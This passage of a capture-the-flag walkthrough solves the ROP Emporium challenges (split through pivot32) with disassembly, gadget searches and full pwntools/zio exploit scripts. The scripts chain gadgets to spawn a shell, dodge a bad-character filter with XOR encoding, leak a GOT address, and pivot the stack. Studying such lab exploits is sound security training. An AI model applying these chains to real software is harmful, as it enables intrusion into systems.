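    """Pack a 32-bit little-endian word."""
    return struct.pack("<I", value)

def call32(func, ret, *args):
    """Stack words for a 32-bit call reached via ret: target, return address, arguments."""
    return p32(func) + p32(ret) + b"".join(p32(a) for a in args)

SYSTEM_PLT = 0x08048430
CAT_FLAG = 0x0804a030          # address of "/bin/cat flag.txt"

payload = b"A" * 44 + call32(SYSTEM_PLT, 0x42424242, CAT_FLAG)
print(payload[44:])
```

When the first payload jumps to the call instruction at 0x08048657 instead, the call pushes its own return address, so no "BBBB" word is needed there.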

split

$ rabin2 -z split
...
vaddr=0x00601060 paddr=0x00001060 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt

The string is at address 0x00601060.

gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
   0x0000000000400807 <+0>:     push   rbp
   0x0000000000400808 <+1>:     mov    rbp,rsp
   0x000000000040080b <+4>:     mov    edi,0x4008ff
   0x0000000000400810 <+9>:     call   0x4005e0 <system@plt>
   0x0000000000400815 <+14>:    nop
   0x0000000000400816 <+15>:    pop    rbp
   0x0000000000400817 <+16>:    ret
End of assembler dump.

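A 64-bit program passes the first argument in rdi (edi is its low 32 bits), so we need one more gadget to put the address of the string into rdi.

First we find the gadget we need: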

gdb-peda$ ropsearch "pop rdi; ret"
Searching for ROP gadget: 'pop rdi; ret' in: binary ranges
0x00400883 : (b'5fc3')  pop rdi; ret

Here is the payload:

$ python2 -c "print 'A'*40 + '\x83\x08\x40\x00\x00\x00\x00\x00' + '\x60\x10\x60\x00\x00\x00\x00\x00' + '\x10\x08\x40\x00\x00\x00\x00\x00'" | ./split
...
> ROPE{a_placeholder_32byte_flag!}

Can we also use the earlier approach and call the PLT address of system(), 0x4005e0?

gdb-peda$ disassemble system
Dump of assembler code for function system:
   0x00007ffff7a63010 <+0>:     test   rdi,rdi
   0x00007ffff7a63013 <+3>:     je     0x7ffff7a63020 <system+16>
   0x00007ffff7a63015 <+5>:     jmp    0x7ffff7a62a70 <do_system>
   0x00007ffff7a6301a <+10>:    nop    WORD PTR [rax+rax*1+0x0]
   0x00007ffff7a63020 <+16>:    lea    rdi,[rip+0x138fd6]        # 0x7ffff7b9bffd
   0x00007ffff7a63027 <+23>:    sub    rsp,0x8
   0x00007ffff7a6302b <+27>:    call   0x7ffff7a62a70 <do_system>
   0x00007ffff7a63030 <+32>:    test   eax,eax
   0x00007ffff7a63032 <+34>:    sete   al
   0x00007ffff7a63035 <+37>:    add    rsp,0x8
   0x00007ffff7a63039 <+41>:    movzx  eax,al
   0x00007ffff7a6303c <+44>:    ret
End of assembler dump.

Yes, we can: argument passing does not use the stack, so we only need to change the address:

from zio import *

payload  = "A"*40
payload += l64(0x00400883)
payload += l64(0x00601060)
payload += l64(0x4005e0)

io = zio('./split')
io.writeline(payload)
io.read()

callme32

Here we meet the real PLT. According to the challenge hint, callme32 imports three special functions from the shared library libcallme32.so:

$ rabin2 -i callme32 | grep callme
ordinal=004 plt=0x080485b0 bind=GLOBAL type=FUNC name=callme_three
ordinal=005 plt=0x080485c0 bind=GLOBAL type=FUNC name=callme_one
ordinal=012 plt=0x08048620 bind=GLOBAL type=FUNC name=callme_two

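What we need to do is call callme_one(), callme_two(), and callme_three() in that order, passing the arguments 1, 2, 3 to each. Debugging reveals the logic: callme_one reads in the encrypted flag, and callme_two and callme_three are then called in turn to decrypt it.

Because function arguments are placed on the stack, we need a pop;pop;pop;ret gadget to balance the stack: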

$ objdump -d callme32 | grep -A 3 pop
...
 80488a8:       5b                      pop    %ebx
 80488a9:       5e                      pop    %esi
 80488aa:       5f                      pop    %edi
 80488ab:       5d                      pop    %ebp
 80488ac:       c3                      ret
 80488ad:       8d 76 00                lea    0x0(%esi),%esi
...

Or add esp, 8; pop; ret; anything that balances the stack will do:

gdb-peda$ ropsearch "add esp, 8"
Searching for ROP gadget: 'add esp, 8' in: binary ranges
0x08048576 : (b'83c4085bc3')    add esp,0x8; pop ebx; ret
0x080488c3 : (b'83c4085bc3')    add esp,0x8; pop ebx; ret

Build the payload as follows:

from zio import *

payload  = "A"*44

payload += l32(0x080485c0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)

payload += l32(0x08048620)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)

payload += l32(0x080485b0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)

io = zio('./callme32')
io.writeline(payload)
io.read()
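The repeated pattern in this payload (function, cleanup gadget, three arguments) can be generated by a loop. The Python 3 sketch below uses only the standard library; chain_calls is a hypothetical helper, and the cleanup gadget must pop exactly as many words as there are arguments so that its ret lands on the next function address.

```python
import struct

def p32(value):
    return struct.pack("<I", value)

def chain_calls(funcs, cleanup, args):
    """Call each function with the same args; `cleanup` pops len(args) words, then rets."""
    out = b""
    for func in funcs:
        out += p32(func) + p32(cleanup) + b"".join(p32(a) for a in args)
    return out

CALLME_ONE, CALLME_TWO, CALLME_THREE = 0x080485c0, 0x08048620, 0x080485b0
POP3_RET = 0x080488a9          # pop esi; pop edi; pop ebp; ret

payload = b"A" * 44 + chain_calls(
    [CALLME_ONE, CALLME_TWO, CALLME_THREE], POP3_RET, [1, 2, 3])
print(len(payload))
```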

callme

A 64-bit program no longer needs the stack balanced; we just put the arguments into the registers in order.

$ rabin2 -i callme | grep callme
ordinal=004 plt=0x00401810 bind=GLOBAL type=FUNC name=callme_three
ordinal=008 plt=0x00401850 bind=GLOBAL type=FUNC name=callme_one
ordinal=011 plt=0x00401870 bind=GLOBAL type=FUNC name=callme_two

gdb-peda$ ropsearch "pop rdi; pop rsi"
Searching for ROP gadget: 'pop rdi; pop rsi' in: binary ranges
0x00401ab0 : (b'5f5e5ac3')      pop rdi; pop rsi; pop rdx; ret

The payload is as follows:

from zio import *

payload  = "A"*40

payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401850)

payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401870)

payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401810)

io = zio('./callme')
io.writeline(payload)
io.read()
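In the 64-bit chain the order within each link is reversed compared with the 32-bit one: the pop gadget and the argument values come first, and the function address comes last. A rough Python 3 sketch follows, with struct standing in for zio's l64 and a hypothetical helper named call64.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian word (stand-in for zio's l64)."""
    return struct.pack("<Q", value)

def call64(pop_args, func, args):
    """Load the arguments through `pop rdi; pop rsi; pop rdx; ret`,
    then let that gadget's ret transfer control to func."""
    return p64(pop_args) + b"".join(p64(a) for a in args) + p64(func)

POP_RDI_RSI_RDX = 0x00401ab0
CALLME_ONE, CALLME_TWO, CALLME_THREE = 0x00401850, 0x00401870, 0x00401810

payload = b"A" * 40
for func in (CALLME_ONE, CALLME_TWO, CALLME_THREE):
    payload += call64(POP_RDI_RSI_RDX, func, (1, 2, 3))

print(len(payload))  # 40 bytes of padding plus three 40-byte links
```

No cleanup gadget is needed because the popped values leave the stack as they are loaded.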

write432

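This time we can no longer find a usable command string in the program. Instead, we can use gadgets to write /bin/sh into the target process's virtual memory, for example into the .data section, and then call system() on it to get a shell. The important point is that ROP is a form of arbitrary code execution: with some creativity it can be used for operations such as reading and writing memory.

The technique is convenient, but we still have to consider the read, write, and execute permissions of the address we write to, how much space it offers, and whether the data we write will interfere with program execution. Since we want to write the string into the .data section, let's check its permissions and size: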

$ readelf -S write432
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  ...
  [16] .rodata           PROGBITS        080486f8 0006f8 000064 00   A  0   0  4
  [25] .data             PROGBITS        0804a028 001028 000008 00  WA  0   0  4

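.data has the flags WA, meaning it is writable (write) and occupies memory at run time (alloc), whereas .rodata cannot be written to. Note that .data is only 8 bytes long, just enough for /bin/sh plus its terminating null byte.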
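The same check can be scripted. This is a small sketch, not part of the original walkthrough, that parses the two readelf -S rows shown above; the function names are illustrative, and the column split assumes the flags column is non-empty, as it is for both rows here.

```python
def parse_section(line):
    """Parse one `readelf -S` row of a 32-bit ELF into a small dict."""
    # Drop the "[Nr]" index, then split the remaining columns on whitespace.
    fields = line.split("]", 1)[1].split()
    name, _type, addr, _off, size, _es, flags = fields[:7]
    return {"name": name, "addr": int(addr, 16),
            "size": int(size, 16), "flags": flags}

def is_writable(section):
    """A section can be written at run time only if it carries the W flag."""
    return "W" in section["flags"]

rodata = parse_section("  [16] .rodata           PROGBITS        080486f8 0006f8 000064 00   A  0   0  4")
data = parse_section("  [25] .data             PROGBITS        0804a028 001028 000008 00  WA  0   0  4")

for sec in (rodata, data):
    print(sec["name"], hex(sec["addr"]), sec["size"], is_writable(sec))
```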

The ropgadget tool makes it easy to find the gadgets we need:

$ ropgadget --binary write432 --only "mov|pop|ret"
...
0x08048670 : mov dword ptr [edi], ebp ; ret
0x080486da : pop edi ; pop ebp ; ret

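Also note that this is a 32-bit program, so each write stores only 4 bytes and the string has to be written in two steps. Pay attention to alignment and to terminating characters such as \x00 and \x0a that could truncate the input. /bin/sh is only seven bytes long, so we can use either /bin/sh\x00 or /bin//sh. The payload is constructed as follows: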

from zio import *

pop_edi_ebp = 0x080486da
mov_edi_ebp = 0x08048670

data_addr   = 0x804a028
system_plt  = 0x8048430

payload  = ""
payload += "A"*44
payload += l32(pop_edi_ebp)
payload += l32(data_addr)
payload += "/bin"
payload += l32(mov_edi_ebp)
payload += l32(pop_edi_ebp)
payload += l32(data_addr+4)
payload += "/sh\x00"
payload += l32(mov_edi_ebp)
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)

io = zio('./write432')
io.writeline(payload)
io.interact()
$ python2 run.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(/binp,/shp0BBBB(�
write4 by ROP Emporium
32bits

Go ahead and give me the string already!
> cat flag.txt
ROPE{a_placeholder_32byte_flag!}
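The two-step write generalizes to strings of any length. Below is a minimal Python 3 sketch that splits the data into 4-byte pieces and emits one pop/mov pair per piece; chunks4 and write_string are hypothetical helper names, and struct replaces zio's l32.

```python
import struct

def p32(value):
    return struct.pack("<I", value)

def chunks4(data):
    """Split data into 4-byte pieces, padding the last piece with null bytes."""
    padded = data + b"\x00" * (-len(data) % 4)
    return [padded[i:i + 4] for i in range(0, len(padded), 4)]

def write_string(data, addr, pop_edi_ebp, mov_edi_ebp):
    """Build the chain that stores data at addr, 4 bytes per gadget pair."""
    chain = b""
    for i, piece in enumerate(chunks4(data)):
        chain += p32(pop_edi_ebp)      # pop edi; pop ebp; ret
        chain += p32(addr + 4 * i)     # edi = destination
        chain += piece                 # ebp = 4 bytes of data
        chain += p32(mov_edi_ebp)      # mov dword ptr [edi], ebp; ret
    return chain

chain = write_string(b"/bin/sh", 0x0804a028, 0x080486da, 0x08048670)
print(chunks4(b"/bin/sh"), len(chain))
```

Padding only adds null bytes when the length is not a multiple of 4, so a string such as /bin//sh is written without a terminator and relies on the following memory already being zero.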

write4

A 64-bit program can write the whole string in a single step.

$ ropgadget --binary write4 --only "mov|pop|ret"
...
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
0x0000000000400890 : pop r14 ; pop r15 ; ret
0x0000000000400893 : pop rdi ; ret

The payload is as follows:

from pwn import *

pop_r14_r15 = 0x0000000000400890
mov_r14_r15 = 0x0000000000400820
pop_rdi = 0x0000000000400893
data_addr = 0x0000000000601050
system_plt = 0x004005e0

payload  = "A"*40
payload += p64(pop_r14_r15)
payload += p64(data_addr)
payload += "/bin/sh\x00"
payload += p64(mov_r14_r15)
payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)

io = process('./write4')
io.recvuntil('>')
io.sendline(payload)
io.interactive()

badchars32

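In this challenge we again need to write /bin/sh into process memory, but this time the program checks the input for forbidden characters as it reads it. Look at the function checkBadchars():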

gdb-peda$ disassemble checkBadchars
Dump of assembler code for function checkBadchars:
   0x08048801 <+0>:     push   ebp
   0x08048802 <+1>:     mov    ebp,esp
   0x08048804 <+3>:     sub    esp,0x10
   0x08048807 <+6>:     mov    BYTE PTR [ebp-0x10],0x62
   0x0804880b <+10>:    mov    BYTE PTR [ebp-0xf],0x69
   0x0804880f <+14>:    mov    BYTE PTR [ebp-0xe],0x63
   0x08048813 <+18>:    mov    BYTE PTR [ebp-0xd],0x2f
   0x08048817 <+22>:    mov    BYTE PTR [ebp-0xc],0x20
   0x0804881b <+26>:    mov    BYTE PTR [ebp-0xb],0x66
   0x0804881f <+30>:    mov    BYTE PTR [ebp-0xa],0x6e
   0x08048823 <+34>:    mov    BYTE PTR [ebp-0x9],0x73
   0x08048827 <+38>:    mov    DWORD PTR [ebp-0x4],0x0
   0x0804882e <+45>:    mov    DWORD PTR [ebp-0x8],0x0
   0x08048835 <+52>:    mov    DWORD PTR [ebp-0x4],0x0
   0x0804883c <+59>:    jmp    0x804887c <checkBadchars+123>
   0x0804883e <+61>:    mov    DWORD PTR [ebp-0x8],0x0
   0x08048845 <+68>:    jmp    0x8048872 <checkBadchars+113>
   0x08048847 <+70>:    mov    edx,DWORD PTR [ebp+0x8]
   0x0804884a <+73>:    mov    eax,DWORD PTR [ebp-0x4]
   0x0804884d <+76>:    add    eax,edx
   0x0804884f <+78>:    movzx  edx,BYTE PTR [eax]
   0x08048852 <+81>:    lea    ecx,[ebp-0x10]
   0x08048855 <+84>:    mov    eax,DWORD PTR [ebp-0x8]
   0x08048858 <+87>:    add    eax,ecx
   0x0804885a <+89>:    movzx  eax,BYTE PTR [eax]
   0x0804885d <+92>:    cmp    dl,al
   0x0804885f <+94>:    jne    0x804886e <checkBadchars+109>
   0x08048861 <+96>:    mov    edx,DWORD PTR [ebp+0x8]
   0x08048864 <+99>:    mov    eax,DWORD PTR [ebp-0x4]
   0x08048867 <+102>:   add    eax,edx
   0x08048869 <+104>:   mov    BYTE PTR [eax],0xeb
   0x0804886c <+107>:   jmp    0x8048878 <checkBadchars+119>
   0x0804886e <+109>:   add    DWORD PTR [ebp-0x8],0x1
   0x08048872 <+113>:   cmp    DWORD PTR [ebp-0x8],0x7
   0x08048876 <+117>:   jbe    0x8048847 <checkBadchars+70>
   0x08048878 <+119>:   add    DWORD PTR [ebp-0x4],0x1
   0x0804887c <+123>:   mov    eax,DWORD PTR [ebp-0x4]
   0x0804887f <+126>:   cmp    eax,DWORD PTR [ebp+0xc]
   0x08048882 <+129>:   jb     0x804883e <checkBadchars+61>
   0x08048884 <+131>:   nop
   0x08048885 <+132>:   leave  
   0x08048886 <+133>:   ret
End of assembler dump.

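The bytes stored by the instructions at 0x08048807 through 0x08048823 are the forbidden characters: b, i, c, /, space, f, n, and s. Any input byte that matches one of them is overwritten with 0xeb. Handling bad characters comes up constantly in exploit development; it is not only arguments that need encoding, sometimes addresses do too. Here we use a simple XOR operation to encode and decode the string.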
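To see what the filter does to an unencoded string, here is a short Python 3 model of the disassembly above. It is a reading of the assembly, not the challenge's source code, and the function name check_badchars is only an approximation of the original.

```python
# The eight bytes written to [ebp-0x10] .. [ebp-0x9]: b i c / space f n s
BADCHARS = bytes([0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73])

def check_badchars(buf):
    """Replace every forbidden byte with 0xeb, as the inner loop does."""
    return bytes(0xeb if b in BADCHARS else b for b in buf)

filtered = check_badchars(b"/bin/sh\x00")
print(filtered)
```

Six of the eight bytes of /bin/sh\x00 are replaced, which is why the string has to be encoded before it is sent.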

Find the gadgets:

$ ropgadget --binary badchars32 --only "mov|pop|ret|xor"
...
0x08048893 : mov dword ptr [edi], esi ; ret
0x08048896 : pop ebx ; pop ecx ; ret
0x08048899 : pop esi ; pop edi ; ret
0x08048890 : xor byte ptr [ebx], cl ; ret

The exploit boils down to encoding before writing and decoding before use. Here is the payload:

from zio import *

xor_ebx_cl  = 0x08048890
pop_ebx_ecx = 0x08048896
pop_esi_edi = 0x08048899
mov_edi_esi = 0x08048893

system_plt  = 0x080484e0
data_addr   = 0x0804a038

# encode
badchars    = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte    = 0x1
while(1):
    binsh = ""
    for i in "/bin/sh\x00":
        c = ord(i) ^ xor_byte
        if c in badchars:
            xor_byte += 1
            break
        else:
            binsh += chr(c)
    if len(binsh) == 8:
        break

# write
payload  = "A"*44
payload += l32(pop_esi_edi)
payload += binsh[:4]
payload += l32(data_addr)
payload += l32(mov_edi_esi)
payload += l32(pop_esi_edi)
payload += binsh[4:8]
payload += l32(data_addr + 4)
payload += l32(mov_edi_esi)

# decode
for i in range(len(binsh)):
    payload += l32(pop_ebx_ecx)
    payload += l32(data_addr + i)
    payload += l32(xor_byte)
    payload += l32(xor_ebx_cl)

# run
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)

io = zio('./badchars32')
io.writeline(payload)
io.interact()
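The key search in the script above can be isolated and checked on its own. The following Python 3 sketch assumes the same bad-character list; find_xor_key is a hypothetical name, and unlike the original loop it also rejects a key that is itself a bad character, since the key travels in the payload too.

```python
BADCHARS = bytes([0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73])

def find_xor_key(data, badchars):
    """Return the smallest single-byte key whose XOR encoding of data
    contains no bad characters, together with the encoded bytes."""
    for key in range(1, 256):
        encoded = bytes(b ^ key for b in data)
        if key not in badchars and not any(b in badchars for b in encoded):
            return key, encoded
    raise ValueError("no single-byte key avoids the bad characters")

key, encoded = find_xor_key(b"/bin/sh\x00", BADCHARS)
decoded = bytes(b ^ key for b in encoded)   # what the xor gadget undoes in memory
print(key, encoded, decoded)
```

With this list the search settles on key 2: key 1 is rejected because it turns b (0x62) into c (0x63), which is itself forbidden.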

badchars

The 64-bit version works the same way; just mind how arguments are passed.

$ ropgadget --binary badchars --only "mov|pop|ret|xor"
...
0x0000000000400b34 : mov qword ptr [r13], r12 ; ret
0x0000000000400b3b : pop r12 ; pop r13 ; ret
0x0000000000400b40 : pop r14 ; pop r15 ; ret
0x0000000000400b30 : xor byte ptr [r15], r14b ; ret
0x0000000000400b39 : pop rdi ; ret

The payload is as follows:

from pwn import *

pop_r12_r13  = 0x0000000000400b3b
mov_r13_r12  = 0x0000000000400b34
pop_r14_r15  = 0x0000000000400b40
xor_r15_r14b = 0x0000000000400b30
pop_rdi      = 0x0000000000400b39

system_plt = 0x00000000004006f0
data_addr  = 0x0000000000601000

badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte = 0x1
while(1):
    binsh = ""
    for i in "/bin/sh\x00":
        c = ord(i) ^ xor_byte
        if c in badchars:
            xor_byte += 1
            break
        else:
            binsh += chr(c)
    if len(binsh) == 8:
        break

payload  = "A"*40
payload += p64(pop_r12_r13)
payload += binsh
payload += p64(data_addr)
payload += p64(mov_r13_r12)

for i in range(len(binsh)):
    payload += p64(pop_r14_r15)
    payload += p64(xor_byte)
    payload += p64(data_addr + i)
    payload += p64(xor_r15_r14b)

payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)

io = process('./badchars')
io.recvuntil('>')
io.sendline(payload)
io.interactive()

fluff32

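This exercise is not much different from the previous ones; the difficulty is that the available gadgets are less direct. One useful trick: since our goal is to write a string, we will certainly need a gadget of the form mov [reg], reg, so we start from there and work backwards to the gadgets needed to set it up.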

$ ropgadget --binary fluff32 --only "mov|pop|ret|xor|xchg"
...
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080483e1 : pop ebx ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret

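We find the gadget mov dword ptr [ecx], edx. If we put the address in ecx and the data in edx, it writes the data to that address. Neither register has a direct pop gadget, so each value is loaded by zeroing edx (xor edx, edx), popping the value into ebx, and copying it across with xor edx, ebx; the address is then moved into ecx with xchg edx, ecx. The payload is as follows: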

from zio import *

system_plt   = 0x08048430
data_addr    = 0x0804a028

pop_ebx      = 0x080483e1
mov_ecx_edx  = 0x08048693
xchg_edx_ecx = 0x08048689
xor_edx_ebx  = 0x0804867b
xor_edx_edx  = 0x08048671

def write_data(data, addr):
    # addr -> ecx
    payload  = l32(xor_edx_edx)
    payload += "BBBB"
    payload += l32(pop_ebx)
    payload += l32(addr)
    payload += l32(xor_edx_ebx)
    payload += "BBBB"
    payload += l32(xchg_edx_ecx)
    payload += "BBBB"

    # data -> edx
    payload += l32(xor_edx_edx)
    payload += "BBBB"
    payload += l32(pop_ebx)
    payload += data
    payload += l32(xor_edx_ebx)
    payload += "BBBB"

    # edx -> [ecx]
    payload += l32(mov_ecx_edx)
    payload += "BBBB"
    payload += l32(0)

    return payload

payload  = "A"*44

payload += write_data("/bin", data_addr)
payload += write_data("/sh\x00", data_addr + 4)

payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)

io = zio('./fluff32')
io.writeline(payload)
io.interact()
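To convince ourselves that the indirect gadgets really end with the data stored at the target address, the register effects of write_data() can be replayed on a toy model. This Python 3 sketch only models the registers and side effects listed in the gadget dump above; the starting register values are arbitrary.

```python
def run_write(addr, data):
    """Replay the gadget effects of write_data() on a tiny register/memory model."""
    reg = {"ecx": 0x22222222, "edx": 0x11111111, "ebx": 0x33333333}
    mem = {}

    def load_edx(value):
        reg["edx"] ^= reg["edx"]     # xor edx, edx  -> edx = 0
        reg["ebx"] = value           # pop ebx
        reg["edx"] ^= reg["ebx"]     # xor edx, ebx  -> edx = value

    load_edx(addr)
    reg["edx"], reg["ecx"] = reg["ecx"], reg["edx"]   # xchg edx, ecx -> ecx = addr
    reg["edx"] = 0xdefaced0                           # side effect of the xchg gadget
    load_edx(data)
    mem[reg["ecx"]] = reg["edx"]                      # mov dword ptr [ecx], edx
    reg["ebx"] = 0                                    # pop ebx, we supply 0
    mem[reg["ecx"]] ^= reg["ebx"] & 0xff              # xor byte ptr [ecx], bl -> unchanged
    return reg, mem

word = int.from_bytes(b"/bin", "little")
reg, mem = run_write(0x0804a028, word)
print(hex(reg["ecx"]), mem[0x0804a028].to_bytes(4, "little"))
```

The trailing l32(0) in write_data() matters: it makes bl zero so that the final xor byte ptr [ecx], bl leaves the freshly written data intact.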

fluff

Hint: when searching with ropgadget, add the --depth option to find longer gadgets.

$ ropgadget --binary fluff --only "mov|pop|ret|xor|xchg" --depth 20
...
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x000000000040084c : pop r15 ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret

The payload is as follows:

from pwn import *

system_plt = 0x004005e0
data_addr  = 0x0000000000601050

xor_r11_r11 = 0x0000000000400822
xor_r11_r12 = 0x000000000040082f
xchg_r11_r10 = 0x0000000000400840
mov_r10_r11 = 0x000000000040084c
pop_r12 = 0x0000000000400832

def write_data(data, addr):
    # addr -> r10
    payload  = p64(xor_r11_r11)
    payload += "BBBBBBBB"
    payload += p64(pop_r12)
    payload += p64(addr)
    payload += p64(xor_r11_r12)
    payload += "BBBBBBBB"
    payload += p64(xchg_r11_r10)
    payload += "BBBBBBBB"

    # data -> r11
    payload += p64(xor_r11_r11)
    payload += "BBBBBBBB"
    payload += p64(pop_r12)
    payload += data
    payload += p64(xor_r11_r12)
    payload += "BBBBBBBB"

    # r11 -> [r10]
    payload += p64(mov_r10_r11)
    payload += "BBBBBBBB"*2
    payload += p64(0)

    return payload

payload  = "A"*40
payload += write_data("/bin/sh\x00", data_addr)
# rdi already holds data_addr: the xor r11, r11 gadget ends with mov edi, 0x601050
payload += p64(system_plt)

io = process('./fluff')
io.recvuntil('>')
io.sendline(payload)
io.interactive()

pivot32

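This is the final challenge, and the difficulty jumps sharply. First, shared libraries: the relative positions of the functions inside a shared library are fixed, so once we know the address of one function we can compute the address of any other from their relative offset. With ASLR enabled, the address at which the library is loaded changes on every run, but the offsets between its functions do not. We therefore need to leak the address of one function first and derive the target function's address from it.

Analysis shows that the program imports foothold_function() from the shared library libpivot32.so but never calls it in its own logic, while libpivot32.so also contains the function we actually want, ret2win().

So foothold_function() is the function whose address we can leak, but how? We briefly introduced lazy binding earlier: only when func@plt() is called for the first time does the dynamic linker write the real address of func() into its GOT entry, func.got.plt; from then on func@plt() jumps through func.got.plt to the real func(). We therefore have to call foothold_function@plt once before reading its GOT entry.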
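Lazy binding can be pictured with a toy model. The Python 3 class below is only an illustration (LazyGot is an invented name), and the addresses are sample values from one run of this challenge; the library address changes on every run under ASLR.

```python
class LazyGot:
    """Toy model of lazy binding for a single imported function."""

    def __init__(self, plt_addr, real_addr):
        self.plt_addr = plt_addr
        self.real_addr = real_addr
        # Before the first call the GOT entry points back into the PLT stub,
        # at the push/jmp pair that invokes the resolver.
        self.got_entry = plt_addr + 6

    def call_via_plt(self):
        """First call: the resolver patches the GOT entry.
        Later calls jump straight through the patched entry."""
        if self.got_entry == self.plt_addr + 6:
            self.got_entry = self.real_addr
        return self.got_entry

foothold = LazyGot(plt_addr=0x080485f0, real_addr=0xf7772770)
before = foothold.got_entry
foothold.call_via_plt()
after = foothold.got_entry
print(hex(before), hex(after))
```

Reading the GOT entry before the first call would only leak an address inside the binary's own PLT, which says nothing about where the library was loaded.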

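Finally, the most important part of the challenge. The program takes two inputs. The first is stored in a heap buffer allocated with malloc(), and to lower the difficulty the program prints that buffer's address. The second is stored on the stack, where only 13 bytes are available, which is not enough room to do much. We therefore need a stack pivot: by overwriting the caller's saved ebp we move the stack frame somewhere else, and by controlling eip at the same time we redirect execution. The usual payload (called the secondary payload here) is laid out as follows: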

buffer padding | fake ebp | leave;ret addr |

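The function's return address is thus overwritten with the address of a leave; ret sequence, so after the function runs its own leave; ret, a second leave; ret is executed.

The fake ebp points to the ebp slot of our other payload (called the main payload here), that is, to the address of the main payload minus 4. Alternatively, you can prepend 4 bytes of padding to the main payload to serve as that ebp slot: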

ebp | payload

A function prologue usually looks like this:

push ebp
mov  ebp,esp

The leave instruction is equivalent to:

mov esp,ebp
pop ebp

The ret instruction is equivalent to:

pop eip

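To summarize when this applies: if the number of bytes we can overflow on the stack is too small to hold the whole chain, and the program has PIE enabled or the system has ASLR enabled, but somewhere else in the process there is enough space to write a payload that we can then execute, we pivot the stack to that location.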
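The double leave; ret can be traced by hand with a small emulator. This Python 3 sketch implements only the two instructions as defined above; the addresses are illustrative sample values (a stack frame near 0xffe7ec68 and a heap buffer at 0xf755cf10) and differ from run to run.

```python
def leave(cpu, mem):
    cpu["esp"] = cpu["ebp"]          # mov esp, ebp
    cpu["ebp"] = mem[cpu["esp"]]     # pop ebp
    cpu["esp"] += 4

def ret(cpu, mem):
    cpu["eip"] = mem[cpu["esp"]]     # pop eip
    cpu["esp"] += 4

LEAVE_RET = 0x0804889f
MAIN_PAYLOAD = 0xf755cf10            # sample address of the heap buffer

mem = {
    0xffe7ec68: MAIN_PAYLOAD - 4,    # saved ebp slot, overwritten with the fake ebp
    0xffe7ec6c: LEAVE_RET,           # return address, overwritten with leave; ret
    MAIN_PAYLOAD - 4: 0x0,           # ebp slot in front of the main payload
    MAIN_PAYLOAD: 0x080485f0,        # first word of the main payload
}
cpu = {"ebp": 0xffe7ec68, "esp": 0xffe7ec40, "eip": LEAVE_RET}

for _ in range(2):                   # the function's own leave; ret, then ours
    leave(cpu, mem)
    ret(cpu, mem)

print({name: hex(value) for name, value in cpu.items()})
```

After the second ret, eip holds the first word of the main payload and esp points just past it, so the rest of the chain runs from the heap buffer.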

The complete exploit is as follows:

from pwn import *

#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot32')
elf = ELF('./pivot32')
libp = ELF('./libpivot32.so')

leave_ret = 0x0804889f

foothold_plt     = elf.plt['foothold_function'] # 0x080485f0
foothold_got_plt = elf.got['foothold_function'] # 0x0804a024

pop_eax      = 0x080488c0
pop_ebx      = 0x08048571
mov_eax_eax  = 0x080488c4
add_eax_ebx  = 0x080488c7
call_eax     = 0x080486a3

foothold_sym = libp.symbols['foothold_function']
ret2win_sym  = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x1f7

leakaddr  = int(io.recv().split()[20], 16)

# call foothold_function() to populate its GOT entry, then load that value into EAX
#gdb.attach(io)
payload_1  = p32(foothold_plt)
payload_1 += p32(pop_eax)
payload_1 += p32(foothold_got_plt)
payload_1 += p32(mov_eax_eax)
payload_1 += p32(pop_ebx)
payload_1 += p32(offset)
payload_1 += p32(add_eax_ebx)
payload_1 += p32(call_eax)

io.sendline(payload_1)

# fake ebp = leakaddr-4, return address = leave_ret
payload_2  = "A"*40
payload_2 += p32(leakaddr-4) + p32(leave_ret)

io.sendline(payload_2)
print io.recvall()

Let's verify this in gdb by setting a breakpoint on the leave instruction in pwnme():

gdb-peda$ b *0x0804889f
Breakpoint 1 at 0x804889f
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xffe7ec68 --> 0xf755cf0c --> 0x0
